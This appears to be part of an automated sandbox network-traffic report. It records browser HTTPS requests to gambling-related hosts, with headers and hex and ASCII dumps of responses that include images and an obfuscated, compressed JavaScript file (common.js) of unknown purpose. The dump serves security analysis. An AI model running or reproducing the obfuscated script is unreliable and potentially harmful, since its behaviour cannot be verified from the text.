                                                                                                                                                          Data Ascii: I3IN6EAqki3uR2neYgDIDVWtemGCk3tTsoBPgDpbnAA35tyNeHX1t98I74P9PLcktW3mbfrXON1bfaumIDgry3TgMbey315GHfw3n511c/X+0PtBw3gB77edX357NcJUmAHHfc3+nSLdi32d4hep3UN4PD9gRgL1Ay3alzxdPnWl+HeU35d7nc9XdALEKmANGLEHF3jd6LfN3wNxXc9Xw/GEAN3QF/3fJ3nVz9e/Qg8IPDhobSGEBMug9/heoVU
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 52 41 50 46 55 45 71 75 79 78 72 4b 6b 6c 58 4b 71 6f 6c 58 59 46 43 6c 56 47 65 58 53 57 68 4a 64 56 62 53 43 70 6c 58 30 71 77 43 42 66 38 66 56 58 41 38 35 6c 57 30 65 5a 64 43 30 58 41 49 42 36 71 7a 6c 56 67 45 4d 56 41 73 51 48 6c 56 2b 61 58 64 42 6c 43 38 48 6c 41 4c 63 31 58 66 4b 69 6a 62 47 71 37 77 56 72 55 37 6c 58 6c 41 52 6c 49 56 51 41 33 79 64 59 59 6e 70 2f 61 59 71 67 34 4e 45 59 53 66 4b 6b 46 57 58 4b 68 46 55 33 4b 79 46 58 65 67 46 57 69 58 41 61 4c 52 6b 30 72 49 57 72 65 4a 31 55 43 71 70 47 6d 37 6f 43 56 57 2b 43 77 4e 57 46 45 42 37 53 4c 53 72 35 57 47 30 71 64 6b 64 4b 76 4e 56 4c 55 67 4a 42 6c 43 39 4a 6a 71 71 6f 56 79 47 30 6a 4e 57 66 64 61 55 58 6c 71 78 35 56 38 69 75 34 71 31 71 7a 56 55 53 42 52 6c 57 6d 71 6c 73 43
                                                                                                                                                          Data Ascii: RAPFUEquyxrKklXKqolXYFClVGeXSWhJdVbSCplX0qwCBf8fVXA85lW0eZdC0XAIB6qzlVgEMVAsQHlV+aXdBlC8HlALc1XfKijbGq7wVrU7lXlARlIVQA3ydYYnp/aYqg4NEYSfKkFWXKhFU3KyFXegFWiXAaLRk0rIWreJ1UCqpGm7oCVW+CwNWFEB7SLSr5WG0qdkdKvNVLUgJBlC9JjqqoVyG0jNWfdaUXlqx5V8iu4q1qzVUSBRlWmqlsC
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 76 6f 56 77 6f 41 55 35 6d 52 59 54 31 73 62 75 6f 75 78 72 73 33 64 6a 46 33 54 64 32 6d 73 52 4d 4b 37 74 50 64 30 52 6e 4c 64 69 77 51 69 43 38 72 73 36 4f 6a 62 75 48 4e 30 59 50 62 64 69 67 32 63 64 39 37 74 6f 56 7a 37 73 2f 6c 33 39 61 54 74 72 61 32 4f 35 6e 57 43 6c 79 32 4c 74 79 67 55 6d 4d 31 6c 37 52 33 73 4f 72 37 58 35 64 2b 58 4f 65 4f 71 4a 30 41 39 71 42 33 6f 39 32 58 4d 63 4f 37 69 30 57 4e 39 79 32 2f 69 6a 59 6a 4c 5a 2f 6f 30 72 35 7a 41 33 44 55 4b 49 58 7a 41 56 31 76 68 64 36 4a 32 41 39 31 34 41 4a 73 77 5a 74 62 34 49 50 68 36 4f 75 48 42 56 64 38 53 6b 31 64 2f 78 30 7a 32 38 75 55 4a 73 70 4e 6c 4b 37 61 76 44 39 2b 4c 5a 78 6b 59 4c 48 73 5a 64 68 6e 76 2f 55 36 6e 74 56 4a 31 6e 74 74 59 41 5a 6e 69 79 33 61 74 62 34 45 33
                                                                                                                                                          Data Ascii: voVwoAU5mRYT1sbuouxrs3djF3Td2msRMK7tPd0RnLdiwQiC8rs6OjbuHN0YPbdig2cd97toVz7s/l39aTtra2O5nWCly2LtygUmM1l7R3sOr7X5d+XOeOqJ0A9qB3o92XMcO7i0WN9y2/ijYjLZ/o0r5zA3DUKIXzAV1vhd6J2A914AJswZtb4IPh6OuHBVd8Sk1d/x0z28uUJspNlK7avD9+LZxkYLHsZdhnv/U6ntVJ1nttYAZniy3atb4E3
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 4c 34 52 33 41 61 2b 48 67 41 41 66 68 43 67 43 37 34 65 41 67 42 2b 47 72 34 5a 53 79 52 2b 48 66 51 4f 66 68 30 51 42 68 49 45 79 79 74 2b 45 38 41 47 45 67 6a 2b 46 52 6f 4c 36 41 6c 35 41 41 69 70 2f 68 50 36 48 63 36 6d 31 68 69 75 43 42 53 6d 5a 45 67 69 47 36 76 70 79 4b 38 79 35 71 69 6b 46 30 34 75 46 36 51 43 67 63 73 59 4a 65 69 6d 6a 79 6e 6d 44 58 67 46 66 6f 47 68 67 55 2b 71 4b 51 31 76 44 70 6f 4d 62 68 32 4e 41 7a 63 67 33 68 6e 6d 41 68 7a 4a 58 6f 70 36 71 51 51 65 73 47 2f 32 47 58 62 4e 52 68 6e 32 54 50 59 52 7a 59 54 74 59 56 41 63 74 68 4d 4f 47 6a 4b 4b 56 42 5a 6f 4a 45 32 6c 72 51 67 66 6a 53 77 57 4f 67 35 67 6a 52 58 6c 69 42 66 35 42 62 6d 4e 32 42 2f 57 46 48 4b 6f 4e 68 44 31 44 52 4b 50 77 77 49 32 45 59 4a 41 4b 61 70 36
                                                                                                                                                          Data Ascii: L4R3Aa+HgAAfhCgC74eAgB+Gr4ZSyR+HfQOfh0QBhIEyyt+E8AGEgj+FRoL6Al5AAip/hP6Hc6m1hiuCBSmZEgiG6vpyK8y5qikF04uF6QCgcsYJeimjynmDXgFfoGhgU+qKQ1vDpoMbh2NAzcg3hnmAhzJXop6qQQesG/2GXbNRhn2TPYRzYTtYVActhMOGjKKVBZoJE2lrQgfjSwWOg5gjRXliBf5BbmN2B/WFHKoNhD1DRKPwwI2EYJAKap6
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 35 6c 6e 6d 2b 32 55 4d 79 44 66 70 62 32 57 38 30 64 62 51 77 46 6e 45 52 61 56 71 46 36 51 71 52 71 36 41 33 54 49 50 52 59 70 72 58 41 4b 6c 6f 79 74 6d 44 2b 57 46 5a 70 4c 53 79 6f 49 55 69 59 62 6e 58 51 4e 44 45 36 47 46 41 31 48 73 2b 45 35 6b 54 4c 71 6c 5a 70 56 71 79 4d 49 39 68 64 33 67 6b 4b 6b 2b 57 67 53 70 50 6c 68 38 35 76 32 45 33 4f 56 67 53 30 72 6e 58 51 4e 71 42 47 41 58 33 62 75 44 67 5a 72 45 79 53 6a 77 52 46 70 6d 34 42 64 4d 75 4a 44 49 79 53 67 51 46 4a 32 67 33 63 6a 4a 4b 77 64 45 74 59 46 79 71 4d 6b 70 44 30 53 39 41 33 5a 6b 46 38 75 50 52 76 41 58 33 2b 52 64 53 2f 41 57 73 75 54 39 75 56 41 56 78 59 51 49 57 2b 56 36 30 57 73 7a 35 6e 50 6d 79 43 71 67 46 4b 41 44 6b 43 69 47 34 45 6d 52 6f 2b 63 31 35 4d 32 47 6f 47 58
                                                                                                                                                          Data Ascii: 5lnm+2UMyDfpb2W80dbQwFnERaVqF6QqRq6A3TIPRYprXAKloytmD+WFZpLSyoIUiYbnXQNDE6GFA1Hs+E5kTLqlZpVqyMI9hd3gkKk+WgSpPlh85v2E3OVgS0rnXQNqBGAX3buDgZrEySjwRFpm4BdMuJDIySgQFJ2g3cjJKwdEtYFyqMkpD0S9A3ZkF8uPRvAX3+RdS/AWsuT9uVAVxYQIW+V60Wsz5nPmyCqgFKADkCiG4EmRo+c15M2GoGX
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 36 33 42 42 79 32 55 7a 46 4a 38 6b 4c 31 4f 45 77 31 4b 41 6e 37 66 42 59 6c 77 59 32 75 6e 56 51 71 51 44 39 44 45 68 77 70 6d 72 65 54 6b 67 34 7a 4a 67 63 67 4c 38 46 62 66 68 48 67 45 46 6b 50 61 32 46 41 41 57 67 41 38 43 6c 61 71 6e 79 51 74 43 39 35 61 33 74 5a 75 68 44 73 64 56 52 4e 33 72 38 39 57 4f 67 78 6a 46 33 32 4c 70 77 33 6b 35 37 39 63 46 4b 54 4c 48 42 6a 43 38 73 71 33 67 7a 37 61 66 6f 4c 67 52 74 45 4d 69 74 34 33 68 35 63 71 74 34 55 6f 41 4b 63 71 63 41 4c 72 44 64 36 4d 2b 35 63 45 44 41 48 52 6a 51 38 46 68 75 6d 6b 30 6b 52 6d 41 6d 59 4e 4e 65 51 77 41 7a 47 6b 66 74 57 49 41 67 48 64 49 69 35 70 71 59 4f 45 70 78 31 6d 52 4a 67 50 30 4d 6f 59 41 7a 41 4a 48 47 4b 50 37 51 6a 4a 64 6f 69 33 72 41 53 44 36 79 44 38 78 7a 65 69
                                                                                                                                                          Data Ascii: 63BBy2UzFJ8kL1OEw1KAn7fBYlwY2unVQqQD9DEhwpmreTkg4zJgcgL8FbfhHgEFkPa2FAAWgA8ClaqnyQtC95a3tZuhDsdVRN3r89WOgxjF32Lpw3k579cFKTLHBjC8sq3gz7afoLgRtEMit43h5cqt4UoAKcqcALrDd6M+5cEDAHRjQ8Fhumk0kRmAmYNNeQwAzGkftWIAgHdIi5pqYOEpx1mRJgP0MoYAzAJHGKP7QjJdoi3rASD6yD8xzei
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 7a 62 79 4d 67 33 6d 6a 46 58 64 67 46 49 38 2b 49 49 6b 67 6e 50 5a 47 74 66 6e 53 7a 34 42 51 54 46 35 6e 5a 51 78 48 4e 55 63 33 59 69 72 30 77 32 63 69 35 79 47 73 74 54 50 30 74 54 58 4f 77 49 67 36 75 78 68 76 6f 50 4d 79 4d 4f 44 58 6a 4d 5a 41 35 67 43 2f 51 6d 33 6a 7a 6b 6a 2b 4b 42 75 67 4f 41 45 73 49 35 47 4d 6d 55 48 41 41 37 59 44 36 79 47 30 67 73 50 31 6c 7a 47 49 77 34 37 4c 31 77 4d 79 41 4b 33 37 6f 39 4e 36 64 33 49 79 79 74 72 78 78 78 6e 48 71 70 4c 62 6f 64 47 6e 6a 73 71 65 43 30 73 41 78 58 41 31 63 6d 61 67 66 39 4f 4d 47 30 49 47 30 43 77 62 41 39 41 74 38 43 30 30 70 41 42 33 6f 6f 4a 41 32 72 56 67 61 6e 6e 32 47 49 6c 31 76 2b 50 4d 63 6d 30 4f 59 77 4f 49 59 49 6c 30 57 6e 4c 32 54 55 66 31 4e 55 72 59 6a 6a 2b 4e 32 38 4e
                                                                                                                                                          Data Ascii: zbyMg3mjFXdgFI8+IIkgnPZGtfnSz4BQTF5nZQxHNUc3Yir0w2ci5yGstTP0tTXOwIg6uxhvoPMyMODXjMZA5gC/Qm3jzkj+KBugOAEsI5GMmUHAA7YD6yG0gsP1lzGIw47L1wMyAK37o9N6d3IyytrxxxnHqpLbodGnjsqeC0sAxXA1cmagf9OMG0IG0CwbA9At8C00pAB3ooJA2rVgann2GIl1v+PMcm0OYwOIYIl0WnL2TUf1NUrYjj+N28N
                                                                                                                                                          2024-06-09 22:41:11 UTC3868INData Raw: 36 54 6c 6e 6d 53 30 37 31 31 47 79 64 6b 36 37 62 54 2b 4d 34 66 70 6e 39 44 48 32 48 32 70 64 37 5a 45 43 6c 7a 51 69 30 35 63 30 46 38 44 69 4b 61 6f 68 6d 72 58 44 2b 5a 51 33 44 35 41 66 64 5a 51 33 6a 50 75 68 46 62 61 46 5a 50 58 57 53 6e 30 6a 70 2b 38 4e 48 45 62 74 57 79 79 2f 48 72 52 4d 4b 39 62 57 75 62 76 32 44 38 43 46 6b 79 58 58 46 35 32 67 7a 76 5a 53 4a 5a 59 71 64 4b 2b 50 42 57 41 6a 67 45 73 30 4f 52 7a 6d 41 63 33 35 53 61 4f 67 39 42 48 33 6e 71 42 4a 45 41 71 36 32 62 49 6d 39 4c 6b 71 76 43 2b 6b 77 58 6d 77 78 72 73 63 41 76 6d 77 2f 72 6c 45 49 53 33 50 41 78 30 33 55 69 6e 43 46 6b 4f 6b 59 2b 55 4d 30 47 45 71 6a 31 6d 74 66 64 4f 43 34 6f 73 30 79 57 71 48 2b 76 49 5a 49 36 65 46 73 73 2b 68 2b 6d 4c 39 6b 4e 51 44 4a 73 2b
                                                                                                                                                          Data Ascii: 6TlnmS0711Gydk67bT+M4fpn9DH2H2pd7ZEClzQi05c0F8DiKaohmrXD+ZQ3D5AfdZQ3jPuhFbaFZPXWSn0jp+8NHEbtWyy/HrRMK9bWubv2D8CFkyXXF52gzvZSJZYqdK+PBWAjgEs0ORzmAc35SaOg9BH3nqBJEAq62bIm9LkqvC+kwXmwxrscAvmw/rlEIS3PAx03UinCFkOkY+UM0GEqj1mtfdOC4os0yWqH+vIZI6eFss+h+mL9kNQDJs+


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          365192.168.2.55013323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC371OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3444"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE18[4],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2366193
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 39b1416e80db525a7f9469d7340b3276
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 225807
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC13380INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          366192.168.2.550136108.157.194.574434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC384OUTGET /zb-cloud/pwv/sn.website.logo.image.url HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.huayidm.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC473INHTTP/1.1 200 OK
                                                                                                                                                          Content-Length: 24
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          api-elapsed: 0
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 930bfe2738c0d99cc17a2f17263cb4d4.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: MXP53-P2
                                                                                                                                                          X-Amz-Cf-Id: 0NIRwzQ-jhHvLekUybU_BKyzceEuOpqLQs9gVXOVd-BmydQ3-eK0eA==
                                                                                                                                                          2024-06-09 22:41:11 UTC24INData Raw: e6 97 a0 e6 95 88 e8 af b7 e6 b1 82 28 65 6d 70 74 79 2d 37 37 37 29 0a
                                                                                                                                                          Data Ascii: (empty-777)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          367192.168.2.55013423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC369OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4cb2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE17[5],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2366193
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ef90423c2c8583f232ec17982072522e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 225807
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC15766INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:11 UTC3868INData Raw: 6c a2 97 23 93 c9 e4 b2 33 e4 b2 f7 d7 39 4c 8d c3 ef b9 bd bc 99 e7 9a 43 e6 f2 39 66 63 4f 33 a2 a1 42 9d b0 09 4d 42 a8 c8 00 00 ec 11 95 6a bd 72 59 d8 92 78 93 33 ef 88 cc e2 e2 44 0c 04 43 b1 23 ae 9e 4e a3 ca 14 06 81 ce 11 2c 7e d3 8a 12 47 70 69 4d 43 0d 26 25 4e a1 17 38 e5 12 c7 2c a4 51 8b 05 a7 85 00 d5 aa 38 89 c5 3b 83 22 04 3b 12 3c d7 17 11 46 ca 36 9d d4 63 40 48 14 fd da 16 38 98 35 59 a8 88 a4 9d c3 bf 7f a6 a2 26 08 c0 3e 5a 64 e3 5b 1d a1 a5 40 e9 a9 9c 64 29 59 94 ab 0a 86 53 50 7e a3 ae a2 71 99 44 9c ba 64 dd e5 c8 5c 3f dd da 64 a4 f7 4d db d3 dc f7 07 42 19 54 fa 7f 66 96 a4 0e ef 28 bc f8 ae a3 c6 06 26 68 bf 43 95 0c 47 4a 8e bd 7c b5 26 21 01 cc 45 97 1f 82 46 b9 c8 b1 9c 44 2d 6c a4 95 1a 45 de 1c 86 45 da 01 f3 dd 5e de 1a
                                                                                                                                                          Data Ascii: l#39LC9fcO3BMBjrYx3DC#N,~GpiMC&%N8,Q8;";<F6c@H85Y&>Zd[@d)YSP~qDd\?dMBTf(&hCGJ|&!EFD-lEE^


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          368192.168.2.55012354.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC543OUTGET /pc/240516-03/static/js/common.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC342INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:42 GMT
                                                                                                                                                          Etag: "6645ca4a-1f134"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:35 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 127284
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 6950770080374955475
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 67 47 5a 63 42 64 41 47 67 47 38 41 69 41 42 67 41 34 42 7a 41 5a 53 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 6c 35 6b 51 5a 4e 41 45 70 71 6e 4a 43 41 41 45 53 58 67 43 64 2b 66 4b 67 47 34 51 41 4f 69 67 42 65 43 69 42 34 6f 41 4a 69 41 37 63 2b 67 74 4d 4b 6d 39 64 58 48 67 4b 47 38 70 41 4e 79 68 4b 35 59 74 47 53 56 6c 2b 36 75 77 6f 53 70 67 67 75 6c 52 55 76 72 71 38 57 67 41 32 68 67 79 38 41 42 62 69 75 6a 54 71 61 41 41 38 53 68 6b 41 31 4c 6b 53 6d 50 7a 52 57 6a 42 4a 48 67 44 43 4a 69 41 41 67 72 79 59 6b 68 49 41 66 4c 71 34 41 47 52 74 2f 4a 6d 74 2b 41 44 73 41 50 77 67 75 53 56 6c 48 6e 55 4e 45 71 7a 38 54 66
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tf
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 4b 62 35 33 36 44 35 55 42 37 75 43 6f 65 39 69 65 37 43 43 37 78 4a 79 34 49 57 58 34 57 55 73 71 7a 73 51 41 6d 4e 37 47 35 4f 55 75 58 39 41 4c 44 65 35 73 77 41 4d 59 76 63 30 77 71 6e 4a 6f 34 63 6f 54 61 53 44 45 32 7a 62 5a 4e 36 53 44 2b 56 59 41 37 64 72 55 73 66 68 67 50 48 34 55 41 43 42 63 38 45 4b 70 54 6b 6e 2b 76 57 4e 72 75 45 4e 52 4b 6d 2b 33 6a 73 42 30 45 64 6a 68 33 67 46 51 45 53 6c 59 41 62 51 55 51 44 47 70 65 41 55 41 4d 4e 78 57 41 53 65 77 70 52 59 67 47 41 4f 50 45 2f 39 44 73 46 77 63 6e 75 66 37 47 49 31 48 67 64 34 7a 79 64 50 6a 43 6a 52 6a 34 66 6a 51 37 6a 53 78 5a 41 55 78 78 38 35 78 65 4c 44 68 4a 31 54 43 51 2b 42 4a 31 4a 39 48 6a 33 66 52 75 6e 5a 4a 33 4e 38 4a 32 45 41 44 4d 67 32 4f 4d 53 6c 37 78 2b 31 57 37 67
                                                                                                                                                          Data Ascii: Kb536D5UB7uCoe9ie7CC7xJy4IWX4WUsqzsQAmN7G5OUuX9ALDe5swAMYvc0wqnJo4coTaSDE2zbZN6SD+VYA7drUsfhgPH4UACBc8EKpTkn+vWNruENRKm+3jsB0Edjh3gFQESlYAbQUQDGpeAUAMNxWASewpRYgGAOPE/9DsFwcnuf7GI1Hgd4zydPjCjRj4fjQ7jSxZAUxx85xeLDhJ1TCQ+BJ1J9Hj3fRunZJ3N8J2EADMg2OMSl7x+1W7g
